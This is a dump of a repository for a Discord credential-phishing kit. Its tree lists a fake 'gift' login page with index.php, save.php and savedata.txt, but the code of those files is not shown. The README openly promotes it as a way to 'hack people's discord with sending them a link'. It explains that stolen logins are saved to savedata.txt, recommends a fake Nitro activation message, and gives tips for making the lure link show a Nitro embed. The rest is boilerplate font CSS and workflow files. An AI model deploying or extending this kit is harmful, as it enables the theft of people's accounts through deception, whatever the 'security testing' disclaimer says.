├── .github └── workflows │ ├── jekyll.yml │ └── php.yml ├── README.md ├── gift ├── HJ9fh9hGfgfijh93 │ ├── assest │ │ ├── Uni Sans Heavy Italic.otf │ │ ├── Uni Sans Heavy.otf │ │ ├── Uni Sans Thin Italic.otf │ │ ├── Uni Sans Thin.otf │ │ ├── background.jpg │ │ ├── heavy │ │ │ ├── generator_config.txt │ │ │ ├── specimen_files │ │ │ │ ├── grid_12-825-55-15.css │ │ │ │ └── specimen_stylesheet.css │ │ │ ├── stylesheet.css │ │ │ ├── uni_sans_heavy-demo.html │ │ │ ├── uni_sans_heavy-webfont.woff │ │ │ └── uni_sans_heavy-webfont.woff2 │ │ └── style.css │ ├── index.html │ └── login │ │ ├── index.php │ │ ├── save.php │ │ └── savedata.txt ├── index.html └── redict-to-gift.js ├── index.html └── redict-to-gift.js /.github/workflows/jekyll.yml: -------------------------------------------------------------------------------- 1 | name: Jekyll site CI 2 | 3 | on: 4 | push: 5 | branches: [ main ] 6 | pull_request: 7 | branches: [ main ] 8 | 9 | jobs: 10 | build: 11 | 12 | runs-on: ubuntu-latest 13 | 14 | steps: 15 | - uses: actions/checkout@v2 16 | - name: Build the site in the jekyll/builder container 17 | run: | 18 | docker run \ 19 | -v ${{ github.workspace }}:/srv/jekyll -v ${{ github.workspace }}/_site:/srv/jekyll/_site \ 20 | jekyll/builder:latest /bin/bash -c "chmod -R 777 /srv/jekyll && jekyll build --future" 21 | -------------------------------------------------------------------------------- /.github/workflows/php.yml: -------------------------------------------------------------------------------- 1 | name: PHP Composer 2 | 3 | on: 4 | push: 5 | branches: [ main ] 6 | pull_request: 7 | branches: [ main ] 8 | 9 | jobs: 10 | build: 11 | 12 | runs-on: ubuntu-latest 13 | 14 | steps: 15 | - uses: actions/checkout@v2 16 | 17 | - name: Validate composer.json and composer.lock 18 | run: composer validate --strict 19 | 20 | - name: Cache Composer packages 21 | id: composer-cache 22 | uses: actions/cache@v2 23 | with: 24 | path: vendor 25 | key: ${{ runner.os }}-php-${{ hashFiles('**/composer.lock') }} 26 | restore-keys: | 27 | ${{ runner.os }}-php- 28 | 29 | - name: Install dependencies 30 | run: composer install --prefer-dist --no-progress 31 | 32 | # Add a test script to composer.json, for instance: "test": "vendor/bin/phpunit" 33 | # Docs: https://getcomposer.org/doc/articles/scripts.md 34 | 35 | # - name: Run test suite 36 | # run: composer run-script test 37 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # discord-link-phishing 2 | > [!CAUTION] 3 | > FOR SECURITY TESTING PURPOSES ONLY 4 | > 5 | > I AM NOT RESPONSIBLE FOR ANY CONSEQUENCES 6 | 7 | > [!WARNING] 8 | > SUPPORT FOR THE REPO HAS BEEN DROPPED IN 2022. FOLLOW UP QUESTIONS WONT BE ANSWERED IN DISCORD 9 | 10 | > [!WARNING] 11 | > This Repo is outdated and you will need to update some of the code to make it compatible with new discord features. 12 | 13 | > [!NOTE] 14 | > hack people's discord with sending them a link! 15 | > 16 | > you can set anything in the file "submited.php". I recommend you to change the content of it to "Your Nitro Will Be Activated Soon!" 17 | 18 | > [!TIP] 19 | > login data will be saved in, "savedata.txt" 20 | 21 | > [!TIP] 22 | > set your default web page to "index.php". if you can't add "/index.php" after the "/login" in url. (this will not show nitro banner on discord, I think) 23 | 24 | If you want te send the link with embeds send it like this: www.yourdomain.com/gift/HJ9fh9hGfgfijh93
25 | if the embeds didn't load, add a "/" to the link
26 | if still is not loading up: add index.html
27 | if still is not loading up add another / to the link
28 | if STILL IS NOT LOADING UP: I really don't know.

29 | -------------------------------------------------------------------------------- /gift/HJ9fh9hGfgfijh93/assest/Uni Sans Heavy Italic.otf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XKMR/discord-link-phishing/8f09be955c8def81d5fbe2ad7195830ed1657647/gift/HJ9fh9hGfgfijh93/assest/Uni Sans Heavy Italic.otf -------------------------------------------------------------------------------- /gift/HJ9fh9hGfgfijh93/assest/Uni Sans Heavy.otf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XKMR/discord-link-phishing/8f09be955c8def81d5fbe2ad7195830ed1657647/gift/HJ9fh9hGfgfijh93/assest/Uni Sans Heavy.otf -------------------------------------------------------------------------------- /gift/HJ9fh9hGfgfijh93/assest/Uni Sans Thin Italic.otf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XKMR/discord-link-phishing/8f09be955c8def81d5fbe2ad7195830ed1657647/gift/HJ9fh9hGfgfijh93/assest/Uni Sans Thin Italic.otf -------------------------------------------------------------------------------- /gift/HJ9fh9hGfgfijh93/assest/Uni Sans Thin.otf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XKMR/discord-link-phishing/8f09be955c8def81d5fbe2ad7195830ed1657647/gift/HJ9fh9hGfgfijh93/assest/Uni Sans Thin.otf -------------------------------------------------------------------------------- /gift/HJ9fh9hGfgfijh93/assest/background.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XKMR/discord-link-phishing/8f09be955c8def81d5fbe2ad7195830ed1657647/gift/HJ9fh9hGfgfijh93/assest/background.jpg -------------------------------------------------------------------------------- /gift/HJ9fh9hGfgfijh93/assest/heavy/generator_config.txt: -------------------------------------------------------------------------------- 1 | # Font Squirrel Font-face Generator Configuration File 2 | # Upload this file to the generator to recreate the settings 3 | # you used to create these fonts. 4 | 5 | {"mode":"optimal","formats":["woff","woff2"],"tt_instructor":"default","fix_gasp":"xy","fix_vertical_metrics":"Y","metrics_ascent":"","metrics_descent":"","metrics_linegap":"","add_spaces":"Y","add_hyphens":"Y","fallback":"none","fallback_custom":"100","options_subset":"basic","subset_custom":"","subset_custom_range":"","subset_ot_features_list":"","css_stylesheet":"stylesheet.css","filename_suffix":"-webfont","emsquare":"2048","spacing_adjustment":"0"} -------------------------------------------------------------------------------- /gift/HJ9fh9hGfgfijh93/assest/heavy/specimen_files/grid_12-825-55-15.css: -------------------------------------------------------------------------------- 1 | /*Notes about grid: 2 | Columns: 12 3 | Grid Width: 825px 4 | Column Width: 55px 5 | Gutter Width: 15px 6 | -------------------------------*/ 7 | 8 | 9 | 10 | .section {margin-bottom: 18px; 11 | } 12 | .section:after {content: ".";display: block;height: 0;clear: both;visibility: hidden;} 13 | .section {*zoom: 1;} 14 | 15 | .section .firstcolumn, 16 | .section .firstcol {margin-left: 0;} 17 | 18 | 19 | /* Border on left hand side of a column. */ 20 | .border { 21 | padding-left: 7px; 22 | margin-left: 7px; 23 | border-left: 1px solid #eee; 24 | } 25 | 26 | /* Border with more whitespace, spans one column. */ 27 | .colborder { 28 | padding-left: 42px; 29 | margin-left: 42px; 30 | border-left: 1px solid #eee; 31 | } 32 | 33 | 34 | 35 | /* The Grid Classes */ 36 | .grid1, .grid1_2cols, .grid1_3cols, .grid1_4cols, .grid2, .grid2_3cols, .grid2_4cols, .grid3, .grid3_2cols, .grid3_4cols, .grid4, .grid4_3cols, .grid5, .grid5_2cols, .grid5_3cols, .grid5_4cols, .grid6, .grid6_4cols, .grid7, .grid7_2cols, .grid7_3cols, .grid7_4cols, .grid8, .grid8_3cols, .grid9, .grid9_2cols, .grid9_4cols, .grid10, .grid10_3cols, .grid10_4cols, .grid11, .grid11_2cols, .grid11_3cols, .grid11_4cols, .grid12 37 | {margin-left: 15px;float: left;display: inline; overflow: hidden;} 38 | 39 | 40 | .width1, .grid1, .span-1 {width: 55px;} 41 | .width1_2cols,.grid1_2cols {width: 20px;} 42 | .width1_3cols,.grid1_3cols {width: 8px;} 43 | .width1_4cols,.grid1_4cols {width: 2px;} 44 | .input_width1 {width: 49px;} 45 | 46 | .width2, .grid2, .span-2 {width: 125px;} 47 | .width2_3cols,.grid2_3cols {width: 31px;} 48 | .width2_4cols,.grid2_4cols {width: 20px;} 49 | .input_width2 {width: 119px;} 50 | 51 | .width3, .grid3, .span-3 {width: 195px;} 52 | .width3_2cols,.grid3_2cols {width: 90px;} 53 | .width3_4cols,.grid3_4cols {width: 37px;} 54 | .input_width3 {width: 189px;} 55 | 56 | .width4, .grid4, .span-4 {width: 265px;} 57 | .width4_3cols,.grid4_3cols {width: 78px;} 58 | .input_width4 {width: 259px;} 59 | 60 | .width5, .grid5, .span-5 {width: 335px;} 61 | .width5_2cols,.grid5_2cols {width: 160px;} 62 | .width5_3cols,.grid5_3cols {width: 101px;} 63 | .width5_4cols,.grid5_4cols {width: 72px;} 64 | .input_width5 {width: 329px;} 65 | 66 | .width6, .grid6, .span-6 {width: 405px;} 67 | .width6_4cols,.grid6_4cols {width: 90px;} 68 | .input_width6 {width: 399px;} 69 | 70 | .width7, .grid7, .span-7 {width: 475px;} 71 | .width7_2cols,.grid7_2cols {width: 230px;} 72 | .width7_3cols,.grid7_3cols {width: 148px;} 73 | .width7_4cols,.grid7_4cols {width: 107px;} 74 | .input_width7 {width: 469px;} 75 | 76 | .width8, .grid8, .span-8 {width: 545px;} 77 | .width8_3cols,.grid8_3cols {width: 171px;} 78 | .input_width8 {width: 539px;} 79 | 80 | .width9, .grid9, .span-9 {width: 615px;} 81 | .width9_2cols,.grid9_2cols {width: 300px;} 82 | .width9_4cols,.grid9_4cols {width: 142px;} 83 | .input_width9 {width: 609px;} 84 | 85 | .width10, .grid10, .span-10 {width: 685px;} 86 | .width10_3cols,.grid10_3cols {width: 218px;} 87 | .width10_4cols,.grid10_4cols {width: 160px;} 88 | .input_width10 {width: 679px;} 89 | 90 | .width11, .grid11, .span-11 {width: 755px;} 91 | .width11_2cols,.grid11_2cols {width: 370px;} 92 | .width11_3cols,.grid11_3cols {width: 241px;} 93 | .width11_4cols,.grid11_4cols {width: 177px;} 94 | .input_width11 {width: 749px;} 95 | 96 | .width12, .grid12, .span-12 {width: 825px;} 97 | .input_width12 {width: 819px;} 98 | 99 | /* Subdivided grid spaces */ 100 | .emptycols_left1, .prepend-1 {padding-left: 70px;} 101 | .emptycols_right1, .append-1 {padding-right: 70px;} 102 | .emptycols_left2, .prepend-2 {padding-left: 140px;} 103 | .emptycols_right2, .append-2 {padding-right: 140px;} 104 | .emptycols_left3, .prepend-3 {padding-left: 210px;} 105 | .emptycols_right3, .append-3 {padding-right: 210px;} 106 | .emptycols_left4, .prepend-4 {padding-left: 280px;} 107 | .emptycols_right4, .append-4 {padding-right: 280px;} 108 | .emptycols_left5, .prepend-5 {padding-left: 350px;} 109 | .emptycols_right5, .append-5 {padding-right: 350px;} 110 | .emptycols_left6, .prepend-6 {padding-left: 420px;} 111 | .emptycols_right6, .append-6 {padding-right: 420px;} 112 | .emptycols_left7, .prepend-7 {padding-left: 490px;} 113 | .emptycols_right7, .append-7 {padding-right: 490px;} 114 | .emptycols_left8, .prepend-8 {padding-left: 560px;} 115 | .emptycols_right8, .append-8 {padding-right: 560px;} 116 | .emptycols_left9, .prepend-9 {padding-left: 630px;} 117 | .emptycols_right9, .append-9 {padding-right: 630px;} 118 | .emptycols_left10, .prepend-10 {padding-left: 700px;} 119 | .emptycols_right10, .append-10 {padding-right: 700px;} 120 | .emptycols_left11, .prepend-11 {padding-left: 770px;} 121 | .emptycols_right11, .append-11 {padding-right: 770px;} 122 | .pull-1 {margin-left: -70px;} 123 | .push-1 {margin-right: -70px;margin-left: 18px;float: right;} 124 | .pull-2 {margin-left: -140px;} 125 | .push-2 {margin-right: -140px;margin-left: 18px;float: right;} 126 | .pull-3 {margin-left: -210px;} 127 | .push-3 {margin-right: -210px;margin-left: 18px;float: right;} 128 | .pull-4 {margin-left: -280px;} 129 | .push-4 {margin-right: -280px;margin-left: 18px;float: right;} -------------------------------------------------------------------------------- /gift/HJ9fh9hGfgfijh93/assest/heavy/specimen_files/specimen_stylesheet.css: -------------------------------------------------------------------------------- 1 | @import url('grid_12-825-55-15.css'); 2 | 3 | /* 4 | CSS Reset by Eric Meyer - Released under Public Domain 5 | http://meyerweb.com/eric/tools/css/reset/ 6 | */ 7 | html, body, div, span, applet, object, iframe, 8 | h1, h2, h3, h4, h5, h6, p, blockquote, pre, 9 | a, abbr, acronym, address, big, cite, code, 10 | del, dfn, em, font, img, ins, kbd, q, s, samp, 11 | small, strike, strong, sub, sup, tt, var, 12 | b, u, i, center, dl, dt, dd, ol, ul, li, 13 | fieldset, form, label, legend, table, 14 | caption, tbody, tfoot, thead, tr, th, td 15 | {margin: 0;padding: 0;border: 0;outline: 0; 16 | font-size: 100%;vertical-align: baseline; 17 | background: transparent;} 18 | body {line-height: 1;} 19 | ol, ul {list-style: none;} 20 | blockquote, q {quotes: none;} 21 | blockquote:before, blockquote:after, 22 | q:before, q:after {content: ''; content: none;} 23 | :focus {outline: 0;} 24 | ins {text-decoration: none;} 25 | del {text-decoration: line-through;} 26 | table {border-collapse: collapse;border-spacing: 0;} 27 | 28 | 29 | 30 | 31 | body { 32 | color: #000; 33 | background-color: #dcdcdc; 34 | } 35 | 36 | a { 37 | text-decoration: none; 38 | color: #1883ba; 39 | } 40 | 41 | h1{ 42 | font-size: 32px; 43 | font-weight: normal; 44 | font-style: normal; 45 | margin-bottom: 18px; 46 | } 47 | 48 | h2{ 49 | font-size: 18px; 50 | } 51 | 52 | #container { 53 | width: 865px; 54 | margin: 0px auto; 55 | } 56 | 57 | 58 | #header { 59 | padding: 20px; 60 | font-size: 36px; 61 | background-color: #000; 62 | color: #fff; 63 | } 64 | 65 | #header span { 66 | color: #666; 67 | } 68 | #main_content { 69 | background-color: #fff; 70 | padding: 60px 20px 20px; 71 | } 72 | 73 | 74 | #footer p { 75 | margin: 0; 76 | padding-top: 10px; 77 | padding-bottom: 50px; 78 | color: #333; 79 | font: 10px Arial, sans-serif; 80 | } 81 | 82 | .tabs { 83 | width: 100%; 84 | height: 31px; 85 | background-color: #444; 86 | } 87 | .tabs li { 88 | float: left; 89 | margin: 0; 90 | overflow: hidden; 91 | background-color: #444; 92 | } 93 | .tabs li a { 94 | display: block; 95 | color: #fff; 96 | text-decoration: none; 97 | font: bold 11px/11px 'Arial'; 98 | text-transform: uppercase; 99 | padding: 10px 15px; 100 | border-right: 1px solid #fff; 101 | } 102 | 103 | .tabs li a:hover { 104 | background-color: #00b3ff; 105 | 106 | } 107 | 108 | .tabs li.active a { 109 | color: #000; 110 | background-color: #fff; 111 | } 112 | 113 | 114 | 115 | div.huge { 116 | 117 | font-size: 300px; 118 | line-height: 1em; 119 | padding: 0; 120 | letter-spacing: -.02em; 121 | overflow: hidden; 122 | } 123 | div.glyph_range { 124 | font-size: 72px; 125 | line-height: 1.1em; 126 | } 127 | 128 | .size10{ font-size: 10px; } 129 | .size11{ font-size: 11px; } 130 | .size12{ font-size: 12px; } 131 | .size13{ font-size: 13px; } 132 | .size14{ font-size: 14px; } 133 | .size16{ font-size: 16px; } 134 | .size18{ font-size: 18px; } 135 | .size20{ font-size: 20px; } 136 | .size24{ font-size: 24px; } 137 | .size30{ font-size: 30px; } 138 | .size36{ font-size: 36px; } 139 | .size48{ font-size: 48px; } 140 | .size60{ font-size: 60px; } 141 | .size72{ font-size: 72px; } 142 | .size90{ font-size: 90px; } 143 | 144 | 145 | .psample_row1 { height: 120px;} 146 | .psample_row1 { height: 120px;} 147 | .psample_row2 { height: 160px;} 148 | .psample_row3 { height: 160px;} 149 | .psample_row4 { height: 160px;} 150 | 151 | .psample { 152 | overflow: hidden; 153 | position: relative; 154 | } 155 | .psample p { 156 | line-height: 1.3em; 157 | display: block; 158 | overflow: hidden; 159 | margin: 0; 160 | } 161 | 162 | .psample span { 163 | margin-right: .5em; 164 | } 165 | 166 | .white_blend { 167 | width: 100%; 168 | height: 61px; 169 | background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAVkAAAA9CAYAAAAH4BojAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAO1JREFUeNrs3TsKgFAMRUE/eer+NxztxMYuEWQG3ECKwwUF58ycAKixOAGAyAKILAAiCyCyACILgMgCiCyAyAIgsgAiCyCyAIgsgMgCiCwAIgsgsgAiC4DIAogsACIL0CWuZ3UGgLrIhjMA1EV2OAOAJQtgyQLwjOzmDAAiCyCyAIgsQFtkd2cAEFkAkQVAZAHaIns4A4AlC2DJAiCyACILILIAiCzAV5H1dQGAJQsgsgCILIDIAvwisl58AViyAJYsACILILIAIgvAe2T9EhxAZAFEFgCRBeiL7HAGgLrIhjMAWLIAliwAt1OAAQDwygTBulLIlQAAAABJRU5ErkJggg==); 170 | position: absolute; 171 | bottom: 0; 172 | } 173 | .black_blend { 174 | width: 100%; 175 | height: 61px; 176 | background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAVkAAAA9CAYAAAAH4BojAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAPJJREFUeNrs3TEKhTAQRVGjibr/9QoxhY2N3Ywo50A28IrLwP9g6b1PAMSYTQAgsgAiC4DIAogsgMgCILIAIgsgsgCILIDIAogsACILILIAIguAyAKILIDIAiCyACILgMgCZCnjLWYAiFGvB0BQZJsZAFyyAC5ZAO6RXc0AILIAIguAyAKkRXYzA4DIAogsACILkBbZ3QwALlkAlywAIgsgsgAiC4DIArwVWf8uAHDJAogsACILILIAv4isH74AXLIALlkARBZAZAFEFoDnyPokOIDIAogsACILkBfZZgaAuMhWMwC4ZAE+p4x3mAEgxinAAJ+XBbPWGkwAAAAAAElFTkSuQmCC); 177 | position: absolute; 178 | bottom: 0; 179 | } 180 | .fullreverse { 181 | background: #000 !important; 182 | color: #fff !important; 183 | margin-left: -20px; 184 | padding-left: 20px; 185 | margin-right: -20px; 186 | padding-right: 20px; 187 | padding: 20px; 188 | margin-bottom:0; 189 | } 190 | 191 | 192 | .sample_table td { 193 | padding-top: 3px; 194 | padding-bottom:5px; 195 | padding-left: 5px; 196 | vertical-align: middle; 197 | line-height: 1.2em; 198 | } 199 | 200 | .sample_table td:first-child { 201 | background-color: #eee; 202 | text-align: right; 203 | padding-right: 5px; 204 | padding-left: 0; 205 | padding: 5px; 206 | font: 11px/12px "Courier New", Courier, mono; 207 | } 208 | 209 | code { 210 | white-space: pre; 211 | background-color: #eee; 212 | display: block; 213 | padding: 10px; 214 | margin-bottom: 18px; 215 | overflow: auto; 216 | } 217 | 218 | 219 | .bottom,.last {margin-bottom:0 !important; padding-bottom:0 !important;} 220 | 221 | .box { 222 | padding: 18px; 223 | margin-bottom: 18px; 224 | background: #eee; 225 | } 226 | 227 | .reverse,.reversed { background: #000 !important;color: #fff !important; border: none !important;} 228 | 229 | #bodycomparison { 230 | position: relative; 231 | overflow: hidden; 232 | font-size: 72px; 233 | height: 90px; 234 | white-space: nowrap; 235 | } 236 | 237 | #bodycomparison div{ 238 | font-size: 72px; 239 | line-height: 90px; 240 | display: inline; 241 | margin: 0 15px 0 0; 242 | padding: 0; 243 | } 244 | 245 | #bodycomparison div span{ 246 | font: 10px Arial; 247 | position: absolute; 248 | left: 0; 249 | } 250 | #xheight { 251 | float: none; 252 | position: absolute; 253 | color: #d9f3ff; 254 | font-size: 72px; 255 | line-height: 90px; 256 | } 257 | 258 | .fontbody { 259 | position: relative; 260 | } 261 | .arialbody{ 262 | font-family: Arial; 263 | position: relative; 264 | } 265 | .verdanabody{ 266 | font-family: Verdana; 267 | position: relative; 268 | } 269 | .georgiabody{ 270 | font-family: Georgia; 271 | position: relative; 272 | } 273 | 274 | /* @group Layout page 275 | */ 276 | 277 | #layout h1 { 278 | font-size: 36px; 279 | line-height: 42px; 280 | font-weight: normal; 281 | font-style: normal; 282 | } 283 | 284 | #layout h2 { 285 | font-size: 24px; 286 | line-height: 23px; 287 | font-weight: normal; 288 | font-style: normal; 289 | } 290 | 291 | #layout h3 { 292 | font-size: 22px; 293 | line-height: 1.4em; 294 | margin-top: 1em; 295 | font-weight: normal; 296 | font-style: normal; 297 | } 298 | 299 | 300 | #layout p.byline { 301 | font-size: 12px; 302 | margin-top: 18px; 303 | line-height: 12px; 304 | margin-bottom: 0; 305 | } 306 | #layout p { 307 | font-size: 14px; 308 | line-height: 21px; 309 | margin-bottom: .5em; 310 | } 311 | 312 | #layout p.large{ 313 | font-size: 18px; 314 | line-height: 26px; 315 | } 316 | 317 | #layout .sidebar p{ 318 | font-size: 12px; 319 | line-height: 1.4em; 320 | } 321 | 322 | #layout p.caption { 323 | font-size: 10px; 324 | margin-top: -16px; 325 | margin-bottom: 18px; 326 | } 327 | 328 | /* @end */ 329 | 330 | /* @group Glyphs */ 331 | 332 | #glyph_chart div{ 333 | background-color: #d9f3ff; 334 | color: black; 335 | float: left; 336 | font-size: 36px; 337 | height: 1.2em; 338 | line-height: 1.2em; 339 | margin-bottom: 1px; 340 | margin-right: 1px; 341 | text-align: center; 342 | width: 1.2em; 343 | position: relative; 344 | padding: .6em .2em .2em; 345 | } 346 | 347 | #glyph_chart div p { 348 | position: absolute; 349 | left: 0; 350 | top: 0; 351 | display: block; 352 | text-align: center; 353 | font: bold 9px Arial, sans-serif; 354 | background-color: #3a768f; 355 | width: 100%; 356 | color: #fff; 357 | padding: 2px 0; 358 | } 359 | 360 | 361 | #glyphs h1 { 362 | font-family: Arial, sans-serif; 363 | } 364 | /* @end */ 365 | 366 | /* @group Installing */ 367 | 368 | #installing { 369 | font: 13px Arial, sans-serif; 370 | } 371 | 372 | #installing p, 373 | #glyphs p{ 374 | line-height: 1.2em; 375 | margin-bottom: 18px; 376 | font: 13px Arial, sans-serif; 377 | } 378 | 379 | 380 | 381 | #installing h3{ 382 | font-size: 15px; 383 | margin-top: 18px; 384 | } 385 | 386 | /* @end */ 387 | 388 | #rendering h1 { 389 | font-family: Arial, sans-serif; 390 | } 391 | .render_table td { 392 | font: 11px "Courier New", Courier, mono; 393 | vertical-align: middle; 394 | } 395 | 396 | 397 | -------------------------------------------------------------------------------- /gift/HJ9fh9hGfgfijh93/assest/heavy/stylesheet.css: -------------------------------------------------------------------------------- 1 | /*! Generated by Font Squirrel (https://www.fontsquirrel.com) on October 26, 2021 */ 2 | 3 | 4 | 5 | @font-face { 6 | font-family: 'uni_sansheavy_caps'; 7 | src: url('uni_sans_heavy-webfont.woff2') format('woff2'), 8 | url('uni_sans_heavy-webfont.woff') format('woff'); 9 | font-weight: normal; 10 | font-style: normal; 11 | 12 | } -------------------------------------------------------------------------------- /gift/HJ9fh9hGfgfijh93/assest/heavy/uni_sans_heavy-demo.html: -------------------------------------------------------------------------------- 1 | 3 | 4 | 5 | 6 | 7 | 8 | 17 | 18 | 19 | 20 | 25 | 26 | Uni Sans Heavy CAPS Regular Specimen 27 | 28 | 29 | 34 | 35 | 36 | 37 |
38 | 40 | 47 | 48 |
49 | 50 | 51 |
52 | 53 |
54 |
55 |
AaBb
56 |
57 |
58 | 59 |
60 |
A​B​C​D​E​F​G​H​I​J​K​L​M​N​O​P​Q​R​S​T​U​V​W​X​Y​Z​a​b​c​d​e​f​g​h​i​j​k​l​m​n​o​p​q​r​s​t​u​v​w​x​y​z​1​2​3​4​5​6​7​8​9​0​&​.​,​?​!​@​(​)​#​$​%​*​+​-​=​:​;
61 |
62 |
63 |
64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 |
10abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
11abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
12abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
13abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
14abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
16abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
18abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
20abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
24abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
30abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
36abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
48abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
60abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
72abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
90abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
81 | 82 |
83 | 84 |
85 | 86 | 87 | 88 |
89 | 90 | 91 |
92 |
◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼◼body
body
body
body
93 |
94 | bodyUni Sans Heavy CAPS Regular 95 |
96 |
97 | bodyArial 98 |
99 |
100 | bodyVerdana 101 |
102 |
103 | bodyGeorgia 104 |
105 | 106 | 107 | 108 |
109 | 110 | 111 |
112 | 113 |
114 |

10.Aenean lacinia bibendum nulla sed consectetur. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. Nullam id dolor id nibh ultricies vehicula ut id elit. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Nulla vitae elit libero, a pharetra augue.

115 | 116 |
117 |
118 |

11.Aenean lacinia bibendum nulla sed consectetur. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. Nullam id dolor id nibh ultricies vehicula ut id elit. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Nulla vitae elit libero, a pharetra augue.

119 | 120 |
121 |
122 |

12.Aenean lacinia bibendum nulla sed consectetur. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. Nullam id dolor id nibh ultricies vehicula ut id elit. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Nulla vitae elit libero, a pharetra augue.

123 | 124 |
125 |
126 |

13.Aenean lacinia bibendum nulla sed consectetur. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. Nullam id dolor id nibh ultricies vehicula ut id elit. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Nulla vitae elit libero, a pharetra augue.

127 | 128 |
129 |
130 | 131 |
132 |
133 |
134 |

14.Aenean lacinia bibendum nulla sed consectetur. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. Nullam id dolor id nibh ultricies vehicula ut id elit. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Nulla vitae elit libero, a pharetra augue.

135 | 136 |
137 |
138 |

16.Aenean lacinia bibendum nulla sed consectetur. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. Nullam id dolor id nibh ultricies vehicula ut id elit. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Nulla vitae elit libero, a pharetra augue.

139 | 140 |
141 |
142 |

18.Aenean lacinia bibendum nulla sed consectetur. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. Nullam id dolor id nibh ultricies vehicula ut id elit. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Nulla vitae elit libero, a pharetra augue.

143 | 144 |
